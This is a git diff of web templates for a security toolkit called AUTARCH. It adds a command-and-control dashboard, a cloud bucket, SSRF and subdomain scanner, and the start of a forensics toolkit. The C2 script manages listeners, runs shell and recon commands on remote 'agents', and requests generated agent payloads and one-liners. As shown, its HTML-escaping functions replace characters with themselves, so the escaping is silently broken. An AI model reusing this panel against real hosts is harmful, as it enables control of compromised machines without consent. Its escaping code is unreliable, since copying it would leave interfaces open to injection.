fetch('/c2/agents').then(r=>r.json()).then(d=>{
|
||||
const agents=d.agents||[];
|
||||
const badge=document.getElementById('agent-badge');
|
||||
if(agents.length){badge.style.display='';badge.textContent=agents.length}
|
||||
else{badge.style.display='none'}
|
||||
|
||||
document.getElementById('dash-agents').innerHTML=agents.length?agents.map(a=>
|
||||
`<div style="display:flex;justify-content:space-between;align-items:center;padding:4px 0;border-bottom:1px solid var(--border);cursor:pointer" onclick="interactAgent('${a.id}')">
|
||||
<div><span class="agent-status-${a.status}">●</span> <strong>${esc(a.id)}</strong>
|
||||
— ${esc(a.user)}@${esc(a.hostname)} (${esc(a.os)})</div>
|
||||
<span style="font-size:0.75rem;color:var(--text-muted)">${esc(a.remote_addr)}</span>
|
||||
</div>`).join(''):'<div style="color:var(--text-muted);font-size:0.85rem">No agents connected</div>';
|
||||
|
||||
document.getElementById('agent-list').innerHTML=agents.length?agents.map(a=>
|
||||
`<div class="card" style="margin-bottom:0.5rem">
|
||||
<div style="display:flex;justify-content:space-between;align-items:center">
|
||||
<div><span class="agent-status-${a.status}">●</span>
|
||||
<strong>${esc(a.id)}</strong> — ${esc(a.user)}@${esc(a.hostname)}</div>
|
||||
<div style="display:flex;gap:0.5rem;align-items:center">
|
||||
<span style="font-size:0.75rem;color:var(--text-muted)">${esc(a.os)} ${esc(a.arch)} | ${esc(a.remote_addr)}</span>
|
||||
<button class="btn btn-sm btn-primary" onclick="interactAgent('${a.id}')">Interact</button>
|
||||
<button class="btn btn-sm" style="color:var(--danger)" onclick="removeAgent('${a.id}')">Remove</button>
|
||||
</div>
|
||||
</div>
|
||||
</div>`).join(''):'';
|
||||
});
|
||||
|
||||
fetch('/c2/tasks').then(r=>r.json()).then(d=>{
|
||||
const tasks=(d.tasks||[]).slice(0,20);
|
||||
document.getElementById('dash-tasks').innerHTML=tasks.length?
|
||||
'<table class="data-table"><thead><tr><th>Task</th><th>Agent</th><th>Type</th><th>Status</th><th>Time</th></tr></thead><tbody>'+
|
||||
tasks.map(t=>`<tr><td style="font-family:monospace;font-size:0.8rem">${t.id}</td><td>${t.agent_id}</td><td>${t.type}</td>
|
||||
<td style="color:${t.status==='completed'?'#22c55e':t.status==='failed'?'var(--danger)':'var(--text-muted)'}">${t.status}</td>
|
||||
<td style="font-size:0.75rem">${(t.created_at||'').slice(11,19)}</td></tr>`).join('')+'</tbody></table>'
|
||||
:'<div style="color:var(--text-muted);font-size:0.85rem">No tasks</div>';
|
||||
});
|
||||
}
|
||||
|
||||
function startListener(){
|
||||
const name=document.getElementById('ls-name').value.trim()||'default';
|
||||
const port=+document.getElementById('ls-port').value||4444;
|
||||
fetch('/c2/listeners',{method:'POST',headers:{'Content-Type':'application/json'},
|
||||
body:JSON.stringify({name,port})})
|
||||
.then(r=>r.json()).then(d=>{
|
||||
if(!d.ok) alert(d.error);
|
||||
refreshDashboard();
|
||||
});
|
||||
}
|
||||
|
||||
function stopListener(name){
|
||||
fetch('/c2/listeners/'+encodeURIComponent(name),{method:'DELETE'})
|
||||
.then(r=>r.json()).then(()=>refreshDashboard());
|
||||
}
|
||||
|
||||
function removeAgent(id){
|
||||
if(!confirm('Remove agent '+id+'?')) return;
|
||||
fetch('/c2/agents/'+id,{method:'DELETE'}).then(r=>r.json()).then(()=>refreshDashboard());
|
||||
}
|
||||
|
||||
function interactAgent(id){
|
||||
currentAgentId=id;
|
||||
document.getElementById('agent-shell').style.display='';
|
||||
document.getElementById('shell-agent-id').textContent=id;
|
||||
document.getElementById('agent-output').textContent='Connected to agent '+id+'\n';
|
||||
document.getElementById('agent-cmd').focus();
|
||||
switchTab('agents');
|
||||
}
|
||||
|
||||
function agentExec(){
|
||||
if(!currentAgentId) return;
|
||||
const input=document.getElementById('agent-cmd');
|
||||
const cmd=input.value.trim();
|
||||
if(!cmd) return;
|
||||
input.value='';
|
||||
const out=document.getElementById('agent-output');
|
||||
out.textContent+='> '+cmd+'\n';
|
||||
fetch('/c2/agents/'+currentAgentId+'/exec',{method:'POST',headers:{'Content-Type':'application/json'},
|
||||
body:JSON.stringify({command:cmd})})
|
||||
.then(r=>r.json()).then(d=>{
|
||||
if(!d.ok){out.textContent+='[error] '+d.error+'\n';return}
|
||||
pollTask(d.task_id);
|
||||
});
|
||||
}
|
||||
|
||||
function agentSysinfo(){
|
||||
if(!currentAgentId) return;
|
||||
fetch('/c2/agents/'+currentAgentId+'/exec',{method:'POST',headers:{'Content-Type':'application/json'},
|
||||
body:JSON.stringify({command:navigator.platform.includes('Win')?'systeminfo':'uname -a && whoami && id'})})
|
||||
.then(r=>r.json()).then(d=>{if(d.ok) pollTask(d.task_id)});
|
||||
}
|
||||
|
||||
function pollTask(taskId){
|
||||
const out=document.getElementById('agent-output');
|
||||
let attempts=0;
|
||||
const poll=setInterval(()=>{
|
||||
fetch('/c2/tasks/'+taskId).then(r=>r.json()).then(d=>{
|
||||
if(d.status==='completed'||d.status==='failed'){
|
||||
clearInterval(poll);
|
||||
if(d.result){
|
||||
const stdout=d.result.stdout||'';
|
||||
const stderr=d.result.stderr||'';
|
||||
if(stdout) out.textContent+=stdout+(stdout.endsWith('\n')?'':'\n');
|
||||
if(stderr) out.textContent+='[stderr] '+stderr+'\n';
|
||||
if(d.result.error) out.textContent+='[error] '+d.result.error+'\n';
|
||||
}
|
||||
out.scrollTop=out.scrollHeight;
|
||||
}
|
||||
if(++attempts>30){clearInterval(poll);out.textContent+='[timeout]\n'}
|
||||
});
|
||||
},1000);
|
||||
}
|
||||
|
||||
function generateAgent(){
|
||||
const payload={host:document.getElementById('gen-host').value.trim(),
|
||||
port:+document.getElementById('gen-port').value,
|
||||
type:document.getElementById('gen-type').value,
|
||||
interval:+document.getElementById('gen-interval').value};
|
||||
fetch('/c2/generate',{method:'POST',headers:{'Content-Type':'application/json'},body:JSON.stringify(payload)})
|
||||
.then(r=>r.json()).then(d=>{
|
||||
const div=document.getElementById('gen-result');
|
||||
if(!d.ok){div.innerHTML='Error: '+esc(d.error);return}
|
||||
div.innerHTML=`<div style="margin-bottom:0.5rem"><strong>Agent ID:</strong> ${d.agent_id} | <strong>File:</strong> ${esc(d.filename)}</div>
|
||||
<pre style="background:#0a0a0a;color:#ccc;padding:1rem;border-radius:var(--radius);max-height:300px;overflow:auto;font-size:0.75rem">${esc(d.code)}</pre>
|
||||
<button class="btn btn-sm" onclick="navigator.clipboard.writeText(document.querySelector('#gen-result pre').textContent)">Copy to Clipboard</button>`;
|
||||
});
|
||||
}
|
||||
|
||||
function getOneliner(){
|
||||
const payload={host:document.getElementById('gen-host').value.trim(),
|
||||
port:+document.getElementById('gen-port').value,
|
||||
type:document.getElementById('gen-type').value};
|
||||
fetch('/c2/oneliner',{method:'POST',headers:{'Content-Type':'application/json'},body:JSON.stringify(payload)})
|
||||
.then(r=>r.json()).then(d=>{
|
||||
const div=document.getElementById('gen-result');
|
||||
if(!d.ok){div.innerHTML='Error: '+esc(d.error);return}
|
||||
div.innerHTML=`<div style="margin-bottom:0.5rem"><strong>One-Liner (${d.type}):</strong></div>
|
||||
<pre style="background:#0a0a0a;color:#0f0;padding:1rem;border-radius:var(--radius);font-size:0.8rem;word-break:break-all">${esc(d.oneliner)}</pre>
|
||||
<button class="btn btn-sm" onclick="navigator.clipboard.writeText('${esc(d.oneliner).replace(/'/g,"\\'")}')">Copy</button>`;
|
||||
});
|
||||
}
|
||||
|
||||
refreshDashboard();
|
||||
if(!refreshTimer) refreshTimer=setInterval(refreshDashboard,10000);
|
||||
|
||||
function esc(s){return s?String(s).replace(/&/g,'&').replace(/</g,'<').replace(/>/g,'>').replace(/"/g,'"').replace(/'/g,'''):''}
|
||||
</script>
|
||||
{% endblock %}
|
||||
275
web/templates/cloud_scan.html
Normal file
275
web/templates/cloud_scan.html
Normal file
@ -0,0 +1,275 @@
|
||||
{% extends "base.html" %}
|
||||
{% block title %}AUTARCH — Cloud Security{% endblock %}
|
||||
|
||||
{% block content %}
|
||||
<div class="page-header">
|
||||
<h1>Cloud Security Scanner</h1>
|
||||
<p style="margin:0;font-size:0.85rem;color:var(--text-secondary)">
|
||||
Discover exposed cloud storage buckets, misconfigured services, and enumerate subdomains.
|
||||
</p>
|
||||
</div>
|
||||
|
||||
<!-- Tab Bar -->
|
||||
<div class="tab-bar">
|
||||
<button class="tab active" data-tab-group="cloud" data-tab="buckets" onclick="showTab('cloud','buckets')">Buckets</button>
|
||||
<button class="tab" data-tab-group="cloud" data-tab="services" onclick="showTab('cloud','services')">Services</button>
|
||||
<button class="tab" data-tab-group="cloud" data-tab="subdomains" onclick="showTab('cloud','subdomains')">Subdomains</button>
|
||||
</div>
|
||||
|
||||
<!-- ==================== BUCKETS TAB ==================== -->
|
||||
<div class="tab-content active" data-tab-group="cloud" data-tab="buckets">
|
||||
|
||||
<div class="section">
|
||||
<h2>Bucket Discovery</h2>
|
||||
<p style="font-size:0.8rem;color:var(--text-muted);margin-bottom:12px">
|
||||
Search for publicly accessible cloud storage buckets by keyword or company name.
|
||||
</p>
|
||||
<div class="form-row" style="margin-bottom:12px">
|
||||
<div class="form-group">
|
||||
<label>Keyword / Company Name</label>
|
||||
<input type="text" id="cloud-bucket-keyword" placeholder="e.g. acme-corp, staging, backups">
|
||||
</div>
|
||||
</div>
|
||||
<div style="margin-bottom:12px">
|
||||
<span style="font-size:0.85rem;color:var(--text-secondary);margin-right:12px">Providers:</span>
|
||||
<label style="margin-right:12px;font-size:0.85rem;color:var(--text-primary);cursor:pointer">
|
||||
<input type="checkbox" id="cloud-prov-aws" checked style="margin-right:4px"> AWS S3
|
||||
</label>
|
||||
<label style="margin-right:12px;font-size:0.85rem;color:var(--text-primary);cursor:pointer">
|
||||
<input type="checkbox" id="cloud-prov-gcs" checked style="margin-right:4px"> Google Cloud Storage
|
||||
</label>
|
||||
<label style="margin-right:12px;font-size:0.85rem;color:var(--text-primary);cursor:pointer">
|
||||
<input type="checkbox" id="cloud-prov-azure" checked style="margin-right:4px"> Azure Blob
|
||||
</label>
|
||||
</div>
|
||||
<div class="tool-actions" style="margin-bottom:12px">
|
||||
<button id="btn-bucket-scan" class="btn btn-primary" onclick="cloudBucketScan()">Scan Buckets</button>
|
||||
<span id="cloud-bucket-status" style="font-size:0.8rem;color:var(--text-muted);margin-left:12px"></span>
|
||||
</div>
|
||||
<table class="data-table">
|
||||
<thead><tr><th>Bucket Name</th><th>Provider</th><th>Status</th><th>Public</th><th>Listable</th></tr></thead>
|
||||
<tbody id="cloud-bucket-results">
|
||||
<tr><td colspan="5" class="empty-state">Enter a keyword and click Scan to discover buckets.</td></tr>
|
||||
</tbody>
|
||||
</table>
|
||||
</div>
|
||||
|
||||
</div>
|
||||
|
||||
<!-- ==================== SERVICES TAB ==================== -->
|
||||
<div class="tab-content" data-tab-group="cloud" data-tab="services">
|
||||
|
||||
<div class="section">
|
||||
<h2>Exposed Services Scanner</h2>
|
||||
<p style="font-size:0.8rem;color:var(--text-muted);margin-bottom:8px">
|
||||
Probe a target URL for commonly exposed cloud services, admin panels, and metadata endpoints.
|
||||
</p>
|
||||
<div class="input-row">
|
||||
<input type="text" id="cloud-svc-url" placeholder="Target URL (e.g. https://example.com)">
|
||||
<button id="btn-svc-scan" class="btn btn-primary" onclick="cloudServiceScan()">Scan Services</button>
|
||||
</div>
|
||||
<table class="data-table" style="margin-bottom:20px">
|
||||
<thead><tr><th>Path</th><th>Service</th><th>Status</th><th>Sensitive</th></tr></thead>
|
||||
<tbody id="cloud-svc-results">
|
||||
<tr><td colspan="4" class="empty-state">Enter a target URL and scan for exposed services.</td></tr>
|
||||
</tbody>
|
||||
</table>
|
||||
</div>
|
||||
|
||||
<div class="section">
|
||||
<h2>Cloud Metadata SSRF Check</h2>
|
||||
<p style="font-size:0.8rem;color:var(--text-muted);margin-bottom:8px">
|
||||
Test for accessible cloud metadata endpoints (IMDS) that may be reachable via SSRF.
|
||||
</p>
|
||||
<div class="input-row">
|
||||
<input type="text" id="cloud-ssrf-url" placeholder="Target URL with SSRF vector">
|
||||
<button id="btn-ssrf-check" class="btn btn-warning" onclick="cloudSSRFCheck()">Check SSRF</button>
|
||||
</div>
|
||||
<pre class="output-panel" id="cloud-ssrf-output" style="min-height:0"></pre>
|
||||
</div>
|
||||
|
||||
</div>
|
||||
|
||||
<!-- ==================== SUBDOMAINS TAB ==================== -->
|
||||
<div class="tab-content" data-tab-group="cloud" data-tab="subdomains">
|
||||
|
||||
<div class="section">
|
||||
<h2>Subdomain Enumeration</h2>
|
||||
<p style="font-size:0.8rem;color:var(--text-muted);margin-bottom:8px">
|
||||
Enumerate subdomains for a target domain and identify cloud provider hints.
|
||||
</p>
|
||||
<div class="input-row">
|
||||
<input type="text" id="cloud-sub-domain" placeholder="Target domain (e.g. example.com)">
|
||||
<button id="btn-sub-enum" class="btn btn-primary" onclick="cloudSubdomainEnum()">Enumerate</button>
|
||||
</div>
|
||||
<span id="cloud-sub-status" style="font-size:0.8rem;color:var(--text-muted)"></span>
|
||||
<table class="data-table" style="margin-top:12px">
|
||||
<thead><tr><th>Subdomain</th><th>IP Address</th><th>Cloud Provider</th></tr></thead>
|
||||
<tbody id="cloud-sub-results">
|
||||
<tr><td colspan="3" class="empty-state">Enter a domain and click Enumerate to discover subdomains.</td></tr>
|
||||
</tbody>
|
||||
</table>
|
||||
</div>
|
||||
|
||||
</div>
|
||||
|
||||
<script>
|
||||
function esc(s) { return String(s).replace(/&/g,'&').replace(/</g,'<'); }
|
||||
|
||||
/* ── Buckets ── */
|
||||
var _bucketPoll = null;
|
||||
|
||||
function cloudBucketScan() {
|
||||
var keyword = document.getElementById('cloud-bucket-keyword').value.trim();
|
||||
if (!keyword) return;
|
||||
var providers = [];
|
||||
if (document.getElementById('cloud-prov-aws').checked) providers.push('aws');
|
||||
if (document.getElementById('cloud-prov-gcs').checked) providers.push('gcs');
|
||||
if (document.getElementById('cloud-prov-azure').checked) providers.push('azure');
|
||||
if (!providers.length) { alert('Select at least one provider.'); return; }
|
||||
|
||||
var btn = document.getElementById('btn-bucket-scan');
|
||||
setLoading(btn, true);
|
||||
document.getElementById('cloud-bucket-status').textContent = 'Scanning...';
|
||||
document.getElementById('cloud-bucket-results').innerHTML = '<tr><td colspan="5" class="empty-state">Scanning...</td></tr>';
|
||||
|
||||
postJSON('/cloud/buckets/scan', {keyword: keyword, providers: providers}).then(function(data) {
|
||||
if (data.error) {
|
||||
setLoading(btn, false);
|
||||
document.getElementById('cloud-bucket-status').textContent = 'Error';
|
||||
renderOutput('cloud-bucket-results', data.error);
|
||||
return;
|
||||
}
|
||||
if (data.job_id) {
|
||||
cloudPollBuckets(data.job_id);
|
||||
} else {
|
||||
setLoading(btn, false);
|
||||
cloudRenderBuckets(data.results || []);
|
||||
}
|
||||
}).catch(function() {
|
||||
setLoading(btn, false);
|
||||
document.getElementById('cloud-bucket-status').textContent = 'Request failed';
|
||||
});
|
||||
}
|
||||
|
||||
function cloudPollBuckets(jobId) {
|
||||
if (_bucketPoll) clearInterval(_bucketPoll);
|
||||
_bucketPoll = setInterval(function() {
|
||||
fetchJSON('/cloud/buckets/status/' + jobId).then(function(data) {
|
||||
if (data.status === 'running') {
|
||||
document.getElementById('cloud-bucket-status').textContent = 'Scanning... (' + (data.checked || 0) + ' checked)';
|
||||
if (data.partial) cloudRenderBuckets(data.partial);
|
||||
} else {
|
||||
clearInterval(_bucketPoll);
|
||||
_bucketPoll = null;
|
||||
setLoading(document.getElementById('btn-bucket-scan'), false);
|
||||
document.getElementById('cloud-bucket-status').textContent = 'Done (' + (data.total || 0) + ' found)';
|
||||
cloudRenderBuckets(data.results || []);
|
||||
}
|
||||
}).catch(function() {
|
||||
clearInterval(_bucketPoll);
|
||||
_bucketPoll = null;
|
||||
setLoading(document.getElementById('btn-bucket-scan'), false);
|
||||
document.getElementById('cloud-bucket-status').textContent = 'Poll error';
|
||||
});
|
||||
}, 2000);
|
||||
}
|
||||
|
||||
function cloudRenderBuckets(results) {
|
||||
var tb = document.getElementById('cloud-bucket-results');
|
||||
if (!results.length) {
|
||||
tb.innerHTML = '<tr><td colspan="5" class="empty-state">No buckets found.</td></tr>';
|
||||
return;
|
||||
}
|
||||
var html = '';
|
||||
results.forEach(function(r) {
|
||||
var statusBadge = r.status === 'exists' ? '<span class="badge badge-pass">Exists</span>'
|
||||
: r.status === 'not_found' ? '<span class="badge badge-info">Not Found</span>'
|
||||
: '<span class="badge badge-medium">' + esc(r.status) + '</span>';
|
||||
html += '<tr><td style="font-family:monospace">' + esc(r.name) + '</td>'
|
||||
+ '<td>' + esc(r.provider) + '</td>'
|
||||
+ '<td>' + statusBadge + '</td>'
|
||||
+ '<td>' + (r.public ? '<span class="badge badge-fail">PUBLIC</span>' : '<span class="badge badge-pass">Private</span>') + '</td>'
|
||||
+ '<td>' + (r.listable ? '<span class="badge badge-fail">YES</span>' : '--') + '</td></tr>';
|
||||
});
|
||||
tb.innerHTML = html;
|
||||
}
|
||||
|
||||
/* ── Services ── */
|
||||
function cloudServiceScan() {
|
||||
var url = document.getElementById('cloud-svc-url').value.trim();
|
||||
if (!url) return;
|
||||
var btn = document.getElementById('btn-svc-scan');
|
||||
setLoading(btn, true);
|
||||
postJSON('/cloud/services/scan', {url: url}).then(function(data) {
|
||||
setLoading(btn, false);
|
||||
var tb = document.getElementById('cloud-svc-results');
|
||||
if (data.error) {
|
||||
tb.innerHTML = '<tr><td colspan="4" class="empty-state">Error: ' + esc(data.error) + '</td></tr>';
|
||||
return;
|
||||
}
|
||||
var results = data.results || [];
|
||||
if (!results.length) {
|
||||
tb.innerHTML = '<tr><td colspan="4" class="empty-state">No exposed services detected.</td></tr>';
|
||||
return;
|
||||
}
|
||||
var html = '';
|
||||
results.forEach(function(r) {
|
||||
var sensitiveBadge = r.sensitive ? '<span class="badge badge-fail">SENSITIVE</span>' : '--';
|
||||
html += '<tr><td style="font-family:monospace;font-size:0.85rem">' + esc(r.path) + '</td>'
|
||||
+ '<td>' + esc(r.name) + '</td>'
|
||||
+ '<td><span class="badge badge-' + (r.status < 400 ? 'pass' : 'info') + '">' + r.status + '</span></td>'
|
||||
+ '<td>' + sensitiveBadge + '</td></tr>';
|
||||
});
|
||||
tb.innerHTML = html;
|
||||
}).catch(function() { setLoading(btn, false); });
|
||||
}
|
||||
|
||||
/* ── SSRF ── */
|
||||
function cloudSSRFCheck() {
|
||||
var url = document.getElementById('cloud-ssrf-url').value.trim();
|
||||
if (!url) return;
|
||||
var btn = document.getElementById('btn-ssrf-check');
|
||||
setLoading(btn, true);
|
||||
postJSON('/cloud/ssrf/check', {url: url}).then(function(data) {
|
||||
setLoading(btn, false);
|
||||
renderOutput('cloud-ssrf-output', data.output || data.error || 'No result');
|
||||
}).catch(function() { setLoading(btn, false); });
|
||||
}
|
||||
|
||||
/* ── Subdomains ── */
|
||||
function cloudSubdomainEnum() {
|
||||
var domain = document.getElementById('cloud-sub-domain').value.trim();
|
||||
if (!domain) return;
|
||||
var btn = document.getElementById('btn-sub-enum');
|
||||
setLoading(btn, true);
|
||||
document.getElementById('cloud-sub-status').textContent = 'Enumerating...';
|
||||
postJSON('/cloud/subdomains/enumerate', {domain: domain}).then(function(data) {
|
||||
setLoading(btn, false);
|
||||
var tb = document.getElementById('cloud-sub-results');
|
||||
if (data.error) {
|
||||
document.getElementById('cloud-sub-status').textContent = 'Error';
|
||||
tb.innerHTML = '<tr><td colspan="3" class="empty-state">Error: ' + esc(data.error) + '</td></tr>';
|
||||
return;
|
||||
}
|
||||
var results = data.results || [];
|
||||
document.getElementById('cloud-sub-status').textContent = results.length + ' subdomains found';
|
||||
if (!results.length) {
|
||||
tb.innerHTML = '<tr><td colspan="3" class="empty-state">No subdomains found.</td></tr>';
|
||||
return;
|
||||
}
|
||||
var html = '';
|
||||
results.forEach(function(r) {
|
||||
var provHint = r.cloud_provider ? '<span class="badge badge-info">' + esc(r.cloud_provider) + '</span>' : '--';
|
||||
html += '<tr><td style="font-family:monospace">' + esc(r.subdomain) + '</td>'
|
||||
+ '<td style="font-family:monospace">' + esc(r.ip || '--') + '</td>'
|
||||
+ '<td>' + provHint + '</td></tr>';
|
||||
});
|
||||
tb.innerHTML = html;
|
||||
}).catch(function() {
|
||||
setLoading(btn, false);
|
||||
document.getElementById('cloud-sub-status').textContent = 'Request failed';
|
||||
});
|
||||
}
|
||||
</script>
|
||||
{% endblock %}
|
||||
1556
web/templates/dns_nameserver.html
Normal file
1556
web/templates/dns_nameserver.html
Normal file
File diff suppressed because it is too large
Load Diff
1607
web/templates/dns_service.html
Normal file
1607
web/templates/dns_service.html
Normal file
File diff suppressed because it is too large
Load Diff
562
web/templates/forensics.html
Normal file
562
web/templates/forensics.html
Normal file
@ -0,0 +1,562 @@
|
||||
{% extends "base.html" %}
|
||||
{% block title %}AUTARCH — Forensics Toolkit{% endblock %}
|
||||
{% block content %}
|
||||
<div class="page-header">
|
||||
<h1>Forensics Toolkit</h1>
|
||||
<p style="margin:0;font-size:0.85rem;color:var(--text-secondary)">
|
||||
File hashing, data carving, timeline analysis, and evidence chain of custody.
|
||||
</p>
|
||||
</div>
|
||||
|
||||
<!-- Tab Bar -->
|
||||
<div class="tab-bar">
|
||||
<button class="tab active" data-tab-group="forensics" data-tab="image" onclick="showTab('forensics','image')">Image</button>
|
||||
<button class="tab" data-tab-group="forensics" data-tab="carve" onclick="showTab('forensics','carve')">Carve</button>
|
||||
<button class="tab" data-tab-group="forensics" data-tab="timeline" onclick="showTab('forensics','timeline')">Timeline</button>
|
||||
<button class="tab" data-tab-group="forensics" data-tab="evidence" onclick="showTab('forensics','evidence')">Evidence</button>
|
||||
</div>
|
||||
|
||||
<!-- ══ Image Tab ══ -->
|
||||
<div class="tab-content active" data-tab-group="forensics" data-tab="image">
|
||||
|
||||
<!-- Hash File -->
|
||||
<div class="section">
|
||||
<h2>Hash File</h2>
|
||||
<div class="form-row">
|
||||
<div class="form-group" style="flex:2">
|
||||
<label>File Path</label>
|
||||
<input type="text" id="for-hash-path" placeholder="/path/to/evidence/file.dd">
|
||||
</div>
|
||||
</div>
|
||||
<div class="tool-actions">
|
||||
<button id="btn-for-hash" class="btn btn-primary" onclick="forHashFile()">Compute Hashes</button>
|
||||
</div>
|
||||
<div id="for-hash-result" style="display:none">
|
||||
<table class="data-table" style="max-width:700px">
|
||||
<tbody>
|
||||
<tr><td style="width:80px;font-weight:600">MD5</td><td id="for-hash-md5" style="font-family:monospace;font-size:0.85rem;word-break:break-all">—</td></tr>
|
||||
<tr><td style="font-weight:600">SHA1</td><td id="for-hash-sha1" style="font-family:monospace;font-size:0.85rem;word-break:break-all">—</td></tr>
|
||||
<tr><td style="font-weight:600">SHA256</td><td id="for-hash-sha256" style="font-family:monospace;font-size:0.85rem;word-break:break-all">—</td></tr>
|
||||
</tbody>
|
||||
</table>
|
||||
</div>
|
||||
</div>
|
||||
|
||||
<!-- Verify Hash -->
|
||||
<div class="section">
|
||||
<h2>Verify Hash</h2>
|
||||
<div class="form-row">
|
||||
<div class="form-group" style="flex:2">
|
||||
<label>File Path</label>
|
||||
<input type="text" id="for-verify-path" placeholder="/path/to/evidence/file.dd">
|
||||
</div>
|
||||
<div class="form-group" style="flex:2">
|
||||
<label>Expected Hash (MD5, SHA1, or SHA256)</label>
|
||||
<input type="text" id="for-verify-hash" placeholder="e3b0c44298fc1c149afbf4c8996fb924...">
|
||||
</div>
|
||||
</div>
|
||||
<div class="tool-actions">
|
||||
<button id="btn-for-verify" class="btn btn-primary" onclick="forVerifyHash()">Verify</button>
|
||||
</div>
|
||||
<div id="for-verify-result" class="progress-text"></div>
|
||||
</div>
|
||||
|
||||
<!-- Disk Image Creator -->
|
||||
<div class="section">
|
||||
<h2>Disk Image Creator</h2>
|
||||
<div class="form-row">
|
||||
<div class="form-group">
|
||||
<label>Source (device or file)</label>
|
||||
<input type="text" id="for-image-source" placeholder="/dev/sda1 or /path/to/source">
|
||||
</div>
|
||||
<div class="form-group">
|
||||
<label>Output File</label>
|
||||
<input type="text" id="for-image-output" placeholder="/path/to/output/image.dd">
|
||||
</div>
|
||||
</div>
|
||||
<div class="tool-actions">
|
||||
<button id="btn-for-image" class="btn btn-primary" onclick="forCreateImage()">Create Image</button>
|
||||
</div>
|
||||
<div id="for-image-status" class="progress-text"></div>
|
||||
<pre class="output-panel scrollable" id="for-image-output-log" style="max-height:200px;display:none"></pre>
|
||||
</div>
|
||||
</div>
|
||||
|
||||
<!-- ══ Carve Tab ══ -->
|
||||
<div class="tab-content" data-tab-group="forensics" data-tab="carve">
|
||||
|
||||
<!-- Carve Form -->
|
||||
<div class="section">
|
||||
<h2>File Carving</h2>
|
||||
<div class="form-row">
|
||||
<div class="form-group" style="flex:2">
|
||||
<label>Source File</label>
|
||||
<input type="text" id="for-carve-source" placeholder="/path/to/disk/image.dd">
|
||||
</div>
|
||||
</div>
|
||||
<div class="form-row">
|
||||
<div class="form-group">
|
||||
<label>File Types</label>
|
||||
<div style="display:flex;gap:12px;flex-wrap:wrap;margin-top:4px">
|
||||
<label style="font-size:0.85rem;cursor:pointer"><input type="checkbox" class="for-carve-type" value="jpg" checked> JPG</label>
|
||||
<label style="font-size:0.85rem;cursor:pointer"><input type="checkbox" class="for-carve-type" value="png" checked> PNG</label>
|
||||
<label style="font-size:0.85rem;cursor:pointer"><input type="checkbox" class="for-carve-type" value="pdf" checked> PDF</label>
|
||||
<label style="font-size:0.85rem;cursor:pointer"><input type="checkbox" class="for-carve-type" value="doc"> DOC/DOCX</label>
|
||||
<label style="font-size:0.85rem;cursor:pointer"><input type="checkbox" class="for-carve-type" value="zip"> ZIP</label>
|
||||
<label style="font-size:0.85rem;cursor:pointer"><input type="checkbox" class="for-carve-type" value="sqlite"> SQLite</label>
|
||||
<label style="font-size:0.85rem;cursor:pointer"><input type="checkbox" class="for-carve-type" value="exe"> EXE/PE</label>
|
||||
<label style="font-size:0.85rem;cursor:pointer"><input type="checkbox" class="for-carve-type" value="elf"> ELF</label>
|
||||
</div>
|
||||
</div>
|
||||
<div class="form-group" style="max-width:160px">
|
||||
<label>Max Files</label>
|
||||
<input type="number" id="for-carve-max" value="100" min="1" max="10000">
|
||||
</div>
|
||||
</div>
|
||||
<div class="tool-actions">
|
||||
<button id="btn-for-carve" class="btn btn-primary" onclick="forCarve()">Carve</button>
|
||||
</div>
|
||||
<div id="for-carve-status" class="progress-text"></div>
|
||||
</div>
|
||||
|
||||
<!-- Carved Files Table -->
|
||||
<div class="section">
|
||||
<h2>Carved Files</h2>
|
||||
<div class="tool-actions">
|
||||
<button class="btn btn-small" onclick="forExportCarved()">Export List</button>
|
||||
<button class="btn btn-small" onclick="forClearCarved()">Clear</button>
|
||||
</div>
|
||||
<table class="data-table">
|
||||
<thead>
|
||||
<tr>
|
||||
<th>Name</th>
|
||||
<th>Type</th>
|
||||
<th>Offset</th>
|
||||
<th>Size</th>
|
||||
<th>MD5</th>
|
||||
</tr>
|
||||
</thead>
|
||||
<tbody id="for-carved-body">
|
||||
<tr><td colspan="5" class="empty-state">No carved files. Run file carving first.</td></tr>
|
||||
</tbody>
|
||||
</table>
|
||||
</div>
|
||||
</div>
|
||||
|
||||
<!-- ══ Timeline Tab ══ -->
|
||||
<div class="tab-content" data-tab-group="forensics" data-tab="timeline">
|
||||
|
||||
<!-- Timeline Builder -->
|
||||
<div class="section">
|
||||
<h2>Timeline Builder</h2>
|
||||
<div class="form-row">
|
||||
<div class="form-group" style="flex:2">
|
||||
<label>Directory Path</label>
|
||||
<input type="text" id="for-timeline-path" placeholder="/path/to/evidence/directory">
|
||||
</div>
|
||||
</div>
|
||||
<div class="tool-actions">
|
||||
<button id="btn-for-timeline" class="btn btn-primary" onclick="forBuildTimeline()">Build Timeline</button>
|
||||
</div>
|
||||
<div id="for-timeline-status" class="progress-text"></div>
|
||||
</div>
|
||||
|
||||
<!-- Events Table -->
|
||||
<div class="section">
|
||||
<h2>Events</h2>
|
||||
<div class="tool-actions">
|
||||
<button class="btn btn-small" onclick="forSortTimeline('timestamp')">Sort by Time</button>
|
||||
<button class="btn btn-small" onclick="forSortTimeline('type')">Sort by Type</button>
|
||||
<button class="btn btn-small" onclick="forSortTimeline('size')">Sort by Size</button>
|
||||
<button class="btn btn-small" onclick="forExportTimeline()">Export CSV</button>
|
||||
</div>
|
||||
<table class="data-table">
|
||||
<thead>
|
||||
<tr>
|
||||
<th style="cursor:pointer" onclick="forSortTimeline('timestamp')">Timestamp</th>
|
||||
<th style="cursor:pointer" onclick="forSortTimeline('type')">Type</th>
|
||||
<th style="cursor:pointer" onclick="forSortTimeline('file')">File</th>
|
||||
<th style="cursor:pointer" onclick="forSortTimeline('size')">Size</th>
|
||||
</tr>
|
||||
</thead>
|
||||
<tbody id="for-timeline-body">
|
||||
<tr><td colspan="4" class="empty-state">No timeline data. Build a timeline from a directory.</td></tr>
|
||||
</tbody>
|
||||
</table>
|
||||
</div>
|
||||
</div>
|
||||
|
||||
<!-- ══ Evidence Tab ══ -->
|
||||
<div class="tab-content" data-tab-group="forensics" data-tab="evidence">
|
||||
|
||||
<!-- Evidence Files -->
|
||||
<div class="section">
|
||||
<h2>Evidence Files</h2>
|
||||
<div class="tool-actions">
|
||||
<button class="btn btn-small" onclick="forRefreshEvidence()">Refresh</button>
|
||||
</div>
|
||||
<div id="for-evidence-files">
|
||||
<p class="empty-state" style="padding:12px;font-size:0.85rem">No evidence files registered.</p>
|
||||
</div>
|
||||
</div>
|
||||
|
||||
<!-- Carved Files List -->
|
||||
<div class="section">
|
||||
<h2>Carved Files</h2>
|
||||
<div id="for-evidence-carved">
|
||||
<p class="empty-state" style="padding:12px;font-size:0.85rem">No carved files. Use the Carve tab to extract files.</p>
|
||||
